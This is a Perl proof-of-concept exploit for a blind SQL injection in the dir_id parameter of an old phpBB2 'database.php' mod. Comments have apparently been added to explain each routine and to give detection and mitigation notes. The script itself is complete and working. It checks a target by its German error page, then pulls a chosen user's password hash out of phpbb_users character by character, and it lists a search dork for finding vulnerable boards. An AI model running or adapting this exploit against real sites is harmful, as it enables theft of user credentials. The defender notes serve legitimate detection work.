- #!/usr/bin/perl
- use strict;
- use warnings;
- use LWP::UserAgent;
- #
- # phpBB2 database.php mod Remote (blind) SQL-Injection
- # Note: its a very old mod, so i could not figure out the
- # name of the mod,even the phpbb.de-administrator could
- # not tell me the name of the mod, though they had the
- # script on their server!
- #
- # Dork: database.php?dir_id
- #
# Top-level driver of a proof-of-concept for a boolean-based blind SQL injection
# in the dir_id parameter of a phpBB2 "database.php" mod. It takes a board URL
# and a user id, sends one probe request, then walks 32 character positions and
# resolves each one through blind()/request().
#
# Defender notes, derived from the requests this listing builds:
#  - Detection: GET requests to database.php whose dir_id value contains "OR",
#    "ASCII(SUBSTR((SELECT" and the phpbb_users table name, repeated in bursts by
#    one client; a single dir_id=' probe beforehand; the literal User-Agent
#    string set below.
#  - Mitigation: remove the mod, or cast dir_id to an integer (or bind it as a
#    parameter) before it reaches the SQL string, and do not render database
#    error pages to visitors, since the probe keys on that error text.
- my $url = shift;
- my $id = shift || usage();    # a missing (or false, e.g. "0") second argument ends in usage(), which exits
# Candidate characters; 16 hex digits over 32 positions is the shape of an MD5
# hex digest -- presumably how the board stores user_password (not shown here).
- my $keyspace = "0123456789abcdef";
- # global vars... nasty eh ?
# @url is a three-part request template: [0] is the injected condition up to the
# SUBSTR position/length arguments, [1] and [2] are empty. request() joins the
# parts with a comparison operator and a character code.
- our @url = ( "$url/database.php?dir_id=7+OR+ASCII(SUBSTR((SELECT+user_password+FROM+phpbb_users+WHERE+user_id=$id),1,1))", '', '' );
- our $regex = 'functions_database\.php';    # body marker request() treats as the "true" answer
- our $ua = LWP::UserAgent->new;
- $ua->agent('mozilla.. :D');    # fixed, non-browser User-Agent: a usable log indicator
- print "[~] Checking...\n";
# Probe: a lone single quote in dir_id. The script only continues when the
# response body contains "Allgemeiner Fehler" (presumably phpBB's German
# "General Error" page), i.e. it relies on the site disclosing SQL errors.
- my $r = $ua->get($url . "/database.php?dir_id='");
- die "\t[!!] Couldnt connect to $url!\n" unless ( $r->is_success );
- die "\t[!!] Target doesnt seem to be vulnerable!\n" unless ( $r->content =~ /Allgemeiner\ Fehler/ );
- print "\t[*] Target seems to be vulnerable\n";
- print "[~] Unleashing Black Magic...\n";
- print STDERR "\t[*] Getting Hash: ";
# One iteration per character position 1..32.
- for ( 1..32 ) {
- $url[0] =~ s/\),[0-9]{1,2},/\),$_,/;    # rewrite the SUBSTR position argument in the template to the current $_
- blind( build_array($keyspace), 0, 16);    # search the sorted code list, index window 0..16; return value is unused
- }
- print "\n";
# usage(): prints the banner below (credits, argument order, a sample invocation
# and a search dork) to STDOUT and terminates the process.
# Reached from the top level through `shift || usage()` when the user-id
# argument is missing or false. Takes no arguments and never returns.
# NOTE(review): the exit status is 0 even though this is the bad-arguments path.
- sub usage {
- print q
- {-----------------------------------------
- - phpBB 'database.php mod' -
- - remote SQL-Injection -
- -----------------------------------------
- - written by electron1x -
- - bug discovered by j0hn.x3r -
- -----------------------------------------
- - Usage -
- - phpdb.pl <board> <user id> -
- - Sample -
- - phpdb.pl http://example.com/phbBB2/ 1 -
- -----------------------------------------
- - Dork -
- - inurl:database.php?dir_id -
- -----------------------------------------
- };
- exit(0);    # ends the script here; callers never get a value back
- }
# blind($keyspace, $bottom, $top): recursive search over the index window
# [$bottom, $top] of $keyspace, an array reference of character codes (as built
# by build_array), for the code that the remote comparison accepts.
#   - Asks request() whether the midpoint code matches with '='; on a hit the
#     midpoint index is returned.
#   - On a miss with a non-empty window it asks again with '<' and recurses
#     into the upper part when that test is false, into the lower part otherwise.
#   - When the window is exhausted it prints an error to STDERR and exits 1.
# Side effect: the current candidate character is echoed to STDERR and erased
# with a backspace on a miss, so the terminal shows the value being resolved.
# NOTE(review): each recursion level issues at most two requests that differ
# only in the comparison operator and number, so one run leaves long series of
# near-identical dir_id requests in the access log.
- sub blind
- {
- my ( $keyspace, $bottom, $top ) = @_;
- my $center = int ($bottom+$top)/2;    # midpoint of the current window, used as the index below
- print STDERR chr $$keyspace[$center];    # show the candidate character
- if ( request($$keyspace[$center], '=')) {
- return $center;
- } elsif ( $top-$bottom > 0) {
- print STDERR "\b";    # wipe the rejected candidate from the terminal
- return blind($keyspace, $center+1, $top )
- unless ( request($$keyspace[$center], '<') );    # '<' test false -> continue in the upper part
- return blind($keyspace, $bottom, $center-1);
- } else {
- print STDERR "[!!] Something went wront, dunno what..\n";
- exit(1);
- }
- }
# build_array($string): returns a reference to an array holding the character
# code (ord) of every character that /./ matches in the first argument, sorted
# in ascending numeric order. blind() indexes into this sorted list.
- sub build_array {
- my @sorted = sort {$a<=>$b} map {ord} $_[0] =~ /./g;    # split into chars, convert to codes, sort numerically
- return \@sorted;
- }
# request($key, $flag): sends one GET request and reports the true/false answer
# of the injected comparison.
#   $key  - number appended after the operator (blind() passes a character code)
#   $flag - comparison operator text (blind() passes '=' or '<')
# The URL is $url[0] . $flag . $url[1] . $key . $url[2], built from the
# file-level @url template; the file-level $ua performs the request.
# Returns the result of matching the response body against the file-level $regex.
# NOTE(review): the HTTP status is not checked, only the body; presumably the
# marker text appears in just one of the two page variants -- confirm.
- sub request {
- my ( $key, $flag ) = @_;
- my $r = $ua->get($url[0] . $flag . $url[1] . $key . $url[2]);
- return ( $r->content =~ /$regex/ );    # body marker present -> condition held
- }
- __END__